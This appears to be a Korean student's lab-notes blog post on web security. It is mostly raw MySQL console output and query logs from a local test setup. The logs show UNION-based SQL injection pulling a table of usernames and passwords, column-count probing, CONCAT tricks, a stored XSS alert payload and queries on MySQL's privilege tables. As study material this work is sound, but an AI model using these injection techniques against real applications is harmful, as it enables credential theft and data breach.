From Evernote: |
[ESPC3] Web Secuity 0x0A |
382 magic_quotes_gpc = Off
tail -f /usr/local/mysql/data/query.log
29 Query update zetyx_board_test set download1=download1, memo=\'AAAA\' where no=\'9\' /*=download1=download1, memo=\'AAAA\' where no=\'9\' /*+1 where no=''
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 30 to server version: 4.0.20-log
Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
mysql> show databases;
+----------+
| Database |
+----------+
| Jack2 |
| mysql |
| test |
| zboard |
| zboard2 |
+----------+
5 rows in set (0.00 sec)
mysql> use Jack2;
Database changed
mysql> desc news;
+-------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id | int(11) | YES | | NULL | |
| title | varchar(20) | YES | | NULL | |
| News | varchar(50) | YES | | NULL | |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
+----------+
| char(65) |
+----------+
| A |
+----------+
1 row in set (0.00 sec)
mysql> select char(65),char(97);
+----------+----------+
| char(65) | char(97) |
+----------+----------+
| A | a |
+----------+----------+
1 row in set (0.00 sec)
+-----------------------+
| CONCAT('1234','5678') |
+-----------------------+
| 12345678 |
+-----------------------+
1 row in set (0.00 sec)
+----------------------------+
| CONCAT('1234',0x2f,'5678') |
+----------------------------+
| 1234/5678 |
+----------------------------+
1 row in set (0.00 sec)
+------------------+
| CONCAT(id,title) |
+------------------+
| 1Test1 |
+------------------+
1 row in set (0.00 sec)
+------------------------------------+
| CONCAT(char(65),char(66),char(67)) |
+------------------------------------+
| ABC |
+------------------------------------+
1 row in set (0.00 sec)
+-------------------------------+
| memo |
+-------------------------------+
| <SCRIPT>alert("XSS")</SCRIPT> |
+-------------------------------+
1 row in set (0.00 sec)
/home/test/public_html/jack2
[root@localhost jack2]# vi view.php
+-------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id | int(11) | YES | | NULL | |
| user | varchar(20) | YES | | NULL | |
| pwd | varchar(20) | YES | | NULL | |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
mysql> INSERT INTO usr (id, user, pwd) VALUES (1,'admin','secret');
Query OK, 1 row affected (0.00 sec)
mysql> INSERT INTO usr (id, user, pwd) VALUES (2,'ad','1234');
Query OK, 1 row affected (0.00 sec)
mysql> INSERT INTO usr (id, user, pwd) VALUES (3,'test','test');
Query OK, 1 row affected (0.00 sec)
+------+-------+--------+
| id | user | pwd |
+------+-------+--------+
| 1 | admin | secret |
| 2 | ad | 1234 |
| 3 | test | test |
+------+-------+--------+
3 rows in set (0.00 sec)
tail -f /usr/local/mysql/data/query.log
120122 0:18:53 63 Query desc news
120122 0:20:17 63 Query CREATE usr (id INT(11), user varchar(20), pwd varchar(20))
120122 0:20:41 63 Query CREATE table usr (id INT(11),user varchar(20), pwd varchar(20))
120122 0:21:02 63 Query desc usr
120122 0:22:02 63 Query INSERT INTO usr (id, user, pwd) VALUES (1,'admin','secret')
120122 0:22:14 63 Query INSERT INTO usr (id, user, pwd) VALUES (2,'ad','1234')
120122 0:22:23 63 Query INSERT INTO usr (id, user, pwd) VALUES (3,'test','test')
120122 0:23:01 63 Query SELECT * FROM usr
120122 0:23:05 63 Query SELECT * FROM usr
120122 0:24:27 63 Quit
120122 0:24:32 64 Connect root@localhost on
64 Init DB Jack2
64 Query SELECT * FROM news WHERE id=1
64 Quit
65 Init DB Jack2
65 Query SELECT * FROM news WHERE id=1 union SELECT * FROM usr
65 Quit
+------+-------+---------+
| id | title | News |
+------+-------+---------+
| 1 | Test1 | Restart |
| 1 | admin | secret |
| 2 | ad | 1234 |
| 3 | test | test |
+------+-------+---------+
4 rows in set (0.00 sec)
+-------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id | int(11) | YES | | NULL | |
| user | varchar(20) | YES | | NULL | |
| pwd | varchar(20) | YES | | NULL | |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
mysql> desc news;
+-------+-------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+-------------+------+-----+---------+-------+
| id | int(11) | YES | | NULL | |
| title | varchar(20) | YES | | NULL | |
| News | varchar(50) | YES | | NULL | |
+-------+-------------+------+-----+---------+-------+
3 rows in set (0.00 sec)
Query OK, 0 rows affected (0.00 sec)
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM fnews;
+------+------+-----------+----------------------+
| id | pri | title | News |
+------+------+-----------+----------------------+
| 1 | 0 | test news | It is a Testing News |
+------+------+-----------+----------------------+
1 row in set (0.00 sec)
ERROR 1222: The used SELECT statements have a different number of columns
-> title VARCHAR(20), News VARCHAR(20)
-> );
Query OK, 0 rows affected (0.01 sec)
mysql> INSERT INTO Anews (title,News) VALUES ('Test', 'It is the testing news');
Query OK, 1 row affected (0.00 sec)
mysql> SELECT * FROM Anews;
+-------+----------------------+
| title | News |
+-------+----------------------+
| Test | It is the testing ne |
+-------+----------------------+
1 row in set (0.00 sec)
ERROR 1222: The used SELECT statements have a different number of columns
+-------+----------------------+
| title | News |
+-------+----------------------+
| Test | It is the testing ne |
| 1 | admin/secret |
| 2 | ad/1234 |
| 3 | test/test |
+-------+----------------------+
4 rows in set (0.01 sec)
+------+------+-----------+----------------------+
| id | pri | title | News |
+------+------+-----------+----------------------+
| 1 | 0 | test news | It is a Testing News |
| 1 | 0 | secret | NULL |
| 2 | 0 | 1234 | NULL |
| 3 | 0 | test | NULL |
+------+------+-----------+----------------------+
4 rows in set (0.00 sec)
+------+------+-----------+----------------------+
| id | pri | title | News |
+------+------+-----------+----------------------+
| 1 | 0 | test news | It is a Testing News |
| 1 | NULL | admin | secret |
| 2 | NULL | ad | 1234 |
| 3 | NULL | test | test |
+------+------+-----------+----------------------+
4 rows in set (0.00 sec)
+------+------+-----------+----------------------+
| id | pri | title | News |
+------+------+-----------+----------------------+
| 1 | 0 | test news | It is a Testing News |
| NULL | NULL | NULL | NULL |
+------+------+-----------+----------------------+
2 rows in set (0.00 sec)
mysql> SELECT * FROM fnews UNION SELECT 1,2,3,4 FROM usr;
| id | pri | title | News |
+------+------+-----------+----------------------+
| 1 | 0 | test news | It is a Testing News |
| 1 | 2 | 3 | 4 |
+------+------+-----------+----------------------+
2 rows in set (0.00 sec)
Database changed
mysql> SELECT host,user , Select_priv FROM user;
+-----------------------+------+-------------+
| host | user | Select_priv |
+-----------------------+------+-------------+
| localhost | root | Y |
| localhost.localdomain | root | Y |
| localhost | | N |
| localhost.localdomain | | N |
+-----------------------+------+-------------+
4 rows in set (0.00 sec)
+-----------------------+-----------------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-----------------------+-----------------+------+-----+---------+-------+
| Host | char(60) binary | | PRI | | |
| Db | char(64) binary | | PRI | | |
| User | char(16) binary | | PRI | | |
| Select_priv | enum('N','Y') | | | N | |
| Insert_priv | enum('N','Y') | | | N | |
| Update_priv | enum('N','Y') | | | N | |
| Delete_priv | enum('N','Y') | | | N | |
| Create_priv | enum('N','Y') | | | N | |
| Drop_priv | enum('N','Y') | | | N | |
| Grant_priv | enum('N','Y') | | | N | |
| References_priv | enum('N','Y') | | | N | |
| Index_priv | enum('N','Y') | | | N | |
| Alter_priv | enum('N','Y') | | | N | |
| Create_tmp_table_priv | enum('N','Y') | | | N | |
| Lock_tables_priv | enum('N','Y') | | | N | |
+-----------------------+-----------------+------+-----+---------+-------+
15 rows in set (0.00 sec)
+---------+------+-------------+
| DB | User | Select_priv |
+---------+------+-------------+
| test | | Y |
| test\_% | | Y |
+---------+------+-------------+
2 rows in set (0.00 sec)
=> 해당 DB에 대해 권한을 접근할 수 있다 없다를 체크할 수 있다.
'Computer Engineering > Security' 카테고리의 다른 글
[ESPC3] Web Secuity 0x09 (0) | 2012.01.30 |
---|---|
[WebScrab]WebScarab Getting Started - OWASP (0) | 2012.01.14 |
[퍼옴]2011년 주요 보안 이슈 정리 및 2012년 보안 이슈 전망 (0) | 2011.12.12 |
[ESPC]0x01 (0) | 2011.11.14 |
[ESPC]0x00 (0) | 2011.11.14 |